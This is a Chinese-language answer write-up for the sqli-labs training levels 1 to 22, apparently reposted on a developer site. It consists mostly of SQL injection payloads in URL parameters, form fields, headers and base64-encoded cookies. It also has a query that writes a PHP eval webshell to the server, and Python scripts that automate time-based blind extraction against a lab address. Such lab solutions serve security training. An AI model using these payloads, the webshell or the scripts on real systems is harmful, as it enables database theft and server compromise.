概述
Less-1
?id=1' order by 3
#正常
?id=1' order by 4
#Unknown column '4' in 'order clause'
?id=666' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+
# information_schema,challenges,mysql,performance_schema,security
?id=666' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 'security') --+
# emails,referers,uagents,users
?id=666' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name = 'users') --+
# id,username,password
?id=666' union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+
# Dumb,Angelina, Dummy, secure,stupid, superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
# Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
Less-2
# 方法同上,不过此题为数值查询
?id=666 union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)
Less-3
?id=666') union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+
Less-4
?id=666") union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+
Less-5
# 页面没有显示位。无法使用联合查询注入 采用报错注入
# and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
?id=1' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Subquery returns more than 1 row
?id=1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Duplicate entry 'security;1' for key 'group_key'
?id=1' and (select 1 from (select count(*),concat(((select concat(table_name,";") from information_schema.tables where table_schema = 'security' limit 3, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Duplicate entry 'users;1' for key 'group_key'
# 以此类推
Less-6
# 把'换成"
Less-7
?id=-1')) union select "<?php @eval($_POST['my']);?>" into outfile "path" --+
# 一句话连上即可
Less-8
# '))改为'
Less-9&10
#区别是前者'后者"
#经过测试发现本题是时间盲注,附上脚本:
# coding:utf-8
import requests
import datetime
def database_len(url): # 获取数据库名长度
for i in range(1, 10):
payload = '''?id=1' and if(length(database())>%s,sleep(1),0)''' % i
time1 = datetime.datetime.now()
r = requests.get(url + payload + '%23')
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 1:
print(i)
else:
print(i)
break
print('database_len:', i)
return i
def database_name(url, database_len): # 获取数据库名
name = ''
for j in range(1, database_len + 1):
for i in '0123456789abcdefghijklmnopqrstuvwxyz':
payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)''' % (
j, i)
# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload + '%23')
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 1:
name += i
print(name)
break
print('database_name:', name)
url = '''http://43.247.91.228:84/Less-9/'''
database_len = database_len(url)
database_name(url, database_len)
#database_name: security
Less-11
?uname=' or '1'='1&passwd=1'union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
#' or '1'='1绕过
Less-12
?uname=") or ("1")=("1&passwd=1")union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
#") or ("1")=("1绕过
Less-13
?uname=1') and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) #
#>XPATH syntax error: ':security'
或者
?uname=1') and (select 1 from (select count(*),concat(((select concat(schema_name, " | ") from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) #
# Duplicate entry 'security | 1' for key 'group_key'
Less-14
把')换成"
Less-15
#没有啥反应哈,试了试万能密码确定是',然后进行时间盲注,对之前的脚本做了个升级哈,这次是多线程
# coding:utf-8
import requests
import datetime
import threading
def database_len(url, i):
postdata = {
'uname': '''admin' and if(length(database())>%s,sleep(2),0) #''' % i,
'passwd': '''1'''
}
time1 = datetime.datetime.now()
r = requests.post(url, data=postdata)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 2:
return True
else:
return False
def database_name(url, j): # 获取数据库名
for i in '0123456789abcdefghijklmnopqrstuvwxyz':
postdata = {
'uname': '''admin' and if(substr(database(),%d,1)='%s',sleep(2),1) #''' % (j, i),
'passwd': '''1'''
}
# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.post(url, data=postdata)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 2:
return i
class MyThread(threading.Thread):
def __init__(self, func, args):
threading.Thread.__init__(self)
self.func = func
self.args = args
def getresult(self):
return self.res
def run(self):
self.res = self.func(*self.args)
def main():
flag = True
url = '''http://43.247.91.228:84/Less-15/'''
while flag:
threads = []
for i in range(0, 9):
t = MyThread(database_len, (url, i + 1))
threads.append(t)
threads[i].start()
for i in range(0, 9):
threads[i].join()
if not threads[i].getresult():
flag = False
databaselength = i + 1
print('database_len:', databaselength)
break
threads = []
name = ''
for i in range(0, databaselength):
t = MyThread(database_name, (url, i + 1))
threads.append(t)
threads[i].start()
for i in range(0, databaselength):
threads[i].join()
name += threads[i].getresult()
print("database_name :" + name)
if __name__ == '__main__':
main()
#database_len: 8
#database_name :security
Less-16
'改成")
Less-17
#尝试了一会儿发现这里只有知道用户名才能进行注入哈,随便试了个admin发现可以,在密码发现有语法报错,于是采用报错注入
?uname=admin&passwd=1' and (select 1 from (select count(*),concat(((select concat(schema_name, " | ") from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) #&submit=Submit
Less-18
#发现页面会返回ip和user-agent,改了下xxf发现不行呀,于是尝试在user-agent注入
User-Agent:1' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) and '1'='1
# XPATH syntax error:':security'
Less-19
#显示位在referer,所以尝试在这里注入
Referer:1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
uname=admin&passwd=admin&submit=Submit
#"security;1"
Less-20
#在cookie里面注入
Cookie: uname=' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) and '1'='1
Less-21
Cookie: uname=JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCI6Iiwoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDQsMSkpKSAgYW5kICcxJz0nMQ==
# 观察了一下要base64,这种形式还是第一次见2333
Less-22
#和上题一样哈,不过把'改成"
Cookie: uname=IiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCI6Iiwoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDQsMSkpKSAgYW5kICIxIj0iMQ==
最后
以上就是土豪棒球为你收集整理的[sqli-labs]Less1~22答案的全部内容,希望文章能够帮你解决[sqli-labs]Less1~22答案所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
![[sqli-labs]Less1~22答案](/uploads/reation/bcimg12.png)
发表评论 取消回复